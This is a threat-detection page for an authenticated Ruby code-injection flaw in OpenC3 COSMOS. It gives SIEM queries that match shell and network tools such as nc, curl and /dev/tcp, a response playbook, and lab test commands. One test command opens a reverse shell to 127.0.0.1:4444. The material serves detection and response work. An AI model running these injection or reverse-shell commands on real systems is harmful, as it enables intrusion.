OpenC3 COSMOS Authenticated RCE via User-Writable Config Overlay (CVE-2026-77602)
Detects exploitation of CVE-2026-77602, an authenticated remote code execution vulnerability in OpenC3 COSMOS (>= 5.1.0, <= 7.2.1). COSMOS evaluates user-supplied configuration files from the writable config overlay — table definitions, command/telemetry (cmd/tlm) definitions, and script suites — as Ruby code. An authenticated user with write access to the config bucket/overlay can embed arbitrary Ruby (e.g. via instance_eval, backticks, system, or inline Ruby in config directives) that executes with the privileges of the COSMOS service when the config is parsed or a script suite is run. CWE-94 (Code Injection). CVSS 9.9, PoC public. This detection looks for suspicious writes/uploads of config overlay files containing executable Ruby primitives, COSMOS service processes spawning shells or interpreters, and anomalous child processes under the cmd-tlm-api / script-runner-api containers.
Vulnerability Intelligence
Public PoCAffected Software
- Vendor
- rubygems
- Product
- openc3
- Versions
- >= 5.1.0, <= 7.2.1
Weakness (CWE)
Timeline
- Disclosed
- September 23, 2026
References & Proof of Concept
- PoChttps://github.com/advisories/GHSA-jjq7-m736-w977
- https://github.com/OpenC3/cosmos/security/advisories/GHSA-jjq7-m736-w977
- https://github.com/OpenC3/cosmos/pull/3488
- https://github.com/OpenC3/cosmos/commit/71943352a28128ef3e7e894319d97a656b5cd4f2
- https://github.com/OpenC3/cosmos/commit/7a1538a4626f82c0d1540fcaa27ffdcbbd71ff81
CVSS
What is CVE-2026-77602 OpenC3 COSMOS Authenticated RCE via User-Writable Config Overlay (CVE-2026-77602)?
OpenC3 COSMOS Authenticated RCE via User-Writable Config Overlay (CVE-2026-77602) (CVE-2026-77602) maps to the Initial Access and Execution tactics — the adversary is trying to get into your network in MITRE ATT&CK.
This page provides production-ready detection logic for OpenC3 COSMOS Authenticated RCE via User-Writable Config Overlay (CVE-2026-77602), covering the data sources and telemetry it touches: Microsoft Defender for Endpoint, DeviceProcessEvents. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
- Tactic
- Initial Access Execution
// COSMOS config-overlay RCE: service container spawning shells/interpreters
let cosmosImages = dynamic(["openc3-cosmos-cmd-tlm-api","openc3-cosmos-script-runner-api","openc3-operator","openc3-cosmos-init"]);
let shells = dynamic(["sh","bash","dash","zsh","nc","ncat","curl","wget","python","python3","perl","ruby","socat"]);
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("ruby","rails","puma","rackup","bundle")
or InitiatingProcessCommandLine has_any ("cmd-tlm-api","script-runner-api","openc3")
| where FileName in~ (shells)
| where ProcessCommandLine has_any ("-c","-e","/dev/tcp","base64","bash -i","curl","wget")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, ProcessId
| order by Timestamp desc Flags COSMOS Ruby/Rails service processes spawning shells or network tools, indicative of Ruby code injection via a malicious config overlay file being parsed.
Data Sources
Required Tables
False Positives
- Legitimate COSMOS plugins that intentionally shell out during install or operation
- Operator-run maintenance scripts that invoke curl/wget for data retrieval
- Container healthcheck or entrypoint scripts that call sh/bash at startup
Sigma rule & cross-platform mapping
The detection logic for OpenC3 COSMOS Authenticated RCE via User-Writable Config Overlay (CVE-2026-77602) (CVE-2026-77602) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: process_creation
product: windows Browse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2026-77602
References (5)
- https://github.com/OpenC3/cosmos/security/advisories/GHSA-jjq7-m736-w977
- https://github.com/OpenC3/cosmos/pull/3488
- https://github.com/OpenC3/cosmos/commit/71943352a28128ef3e7e894319d97a656b5cd4f2
- https://github.com/OpenC3/cosmos/commit/7a1538a4626f82c0d1540fcaa27ffdcbbd71ff81
- https://github.com/advisories/GHSA-jjq7-m736-w977
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Ruby inline code execution simulating config overlay parse
Expected signal: Process launch of ruby parenting /bin/sh and id/hostname; execve records in auditd/Sysmon-for-Linux.
- Test 2Ruby backtick command injection
Expected signal: ruby process spawning curl with network access; process-create and network-connect events.
- Test 3Simulated reverse shell from Ruby service context
Expected signal: ruby parenting bash -i with /dev/tcp redirection; outbound TCP to 127.0.0.1:4444.
Response Playbook
Triage
- Confirm the OpenC3 COSMOS version on the affected host is in the vulnerable range (>= 5.1.0, <= 7.2.1); if so, exploitation is plausible.
- Identify the config overlay file that was written/modified immediately before the suspicious process launch — inspect table definitions, cmd/tlm definitions, and script suite files in the config bucket (MinIO/S3) or overlay directory for embedded Ruby (instance_eval, system, backticks, %x{}, inline Ruby).
- Correlate the authenticated COSMOS user/session that uploaded or edited the config overlay via the cmd-tlm-api / script-runner-api access logs with the timestamp of the shell spawn.
- Determine whether the spawned process made outbound network connections (reverse shell, tool download) or wrote new files to disk.
Containment
- Isolate the affected COSMOS host/container from the network and revoke the implicated user's session tokens and credentials.
- Remove or quarantine the malicious config overlay file(s) from the config bucket/overlay and prevent re-parsing; disable script suite execution until remediated.
- Upgrade OpenC3 COSMOS to the patched release (beyond 7.2.1) per GHSA-jjq7-m736-w977 and restrict write access to the config overlay bucket.
Evidence Collection
- Preserve the malicious config overlay file(s), the container filesystem diff, and process execution records (auditd/Sysmon) for the spawned shells.
- Collect cmd-tlm-api / script-runner-api application logs and the MinIO/S3 access logs showing the config upload, including source IP and authenticated user.
Escalation Criteria
- ! Escalate to IR if the spawned process established outbound C2, downloaded additional tooling, or achieved persistence.
- ! Escalate if lateral movement from the COSMOS host, credential access, or tampering with command/telemetry definitions affecting mission systems is observed.
Investigation Guide
Forensic Artifacts
- >
Modified/new config overlay files (table defs, cmd/tlm defs, script suites) in the COSMOS config bucket or overlay directory containing Ruby execution primitives. - >
Process execution records (auditd execve / Sysmon-for-Linux ProcessCreate) showing ruby/puma parenting a shell or network tool. - >
cmd-tlm-api / script-runner-api access logs and MinIO/S3 object-write events for the overlay upload.
Tuning Guidance
Baseline legitimate COSMOS plugin install/operation shell-outs and container entrypoint scripts, then exclude those specific parent/child/command-line combinations. Tighten by requiring an immediately-preceding config overlay write by the same container, or by alerting only when the spawned process makes outbound connections. In environments where operators routinely run script suites, correlate with unexpected authenticated users or off-hours activity to reduce noise.
Hunting Queries
Hunt for any COSMOS Ruby service process spawning shells/network tools, independent of command-line keywords, to catch lower-noise variants.
DeviceProcessEvents | where InitiatingProcessFileName in~ ("ruby","puma","rails") | where FileName in~ ("sh","bash","nc","curl","wget","python3") | summarize count() by DeviceName, AccountName, ProcessCommandLine, bin(Timestamp, 1h) index=linux (parent_process_name=ruby OR parent_process_name=puma) process_name IN (sh,bash,nc,curl,wget,python3) | stats count by host, user, process Atomic Red Team Tests
Simulates COSMOS evaluating a config overlay file by running Ruby that shells out, modeling CWE-94 code injection.
Command
ruby -e 'system("id; hostname")' Cleanup
echo 'no cleanup required' Expected Telemetry
Process launch of ruby parenting /bin/sh and id/hostname; execve records in auditd/Sysmon-for-Linux.
Expected Detection
KQL/SPL/EQL rules fire on ruby-parented shell spawn.
Models Ruby backtick (`%x`) execution as would be embedded in a malicious cmd/tlm definition or script suite.
Command
ruby -e 'puts `curl -s http://127.0.0.1:9999/x || true`' Cleanup
echo 'no cleanup required' Expected Telemetry
ruby process spawning curl with network access; process-create and network-connect events.
Expected Detection
Detection matches ruby parent spawning curl with command-line indicators.
Lab-only simulation of an injected reverse shell as would result from config-overlay RCE. Run only in an isolated lab.
Command
ruby -e 'system("bash -c \"bash -i >& /dev/tcp/127.0.0.1/4444 0>&1\" || true")' Cleanup
pkill -f '/dev/tcp/127.0.0.1/4444' 2>/dev/null || true Expected Telemetry
ruby parenting bash -i with /dev/tcp redirection; outbound TCP to 127.0.0.1:4444.
Expected Detection
Rules fire on bash -i / /dev/tcp pattern parented by a Ruby service process.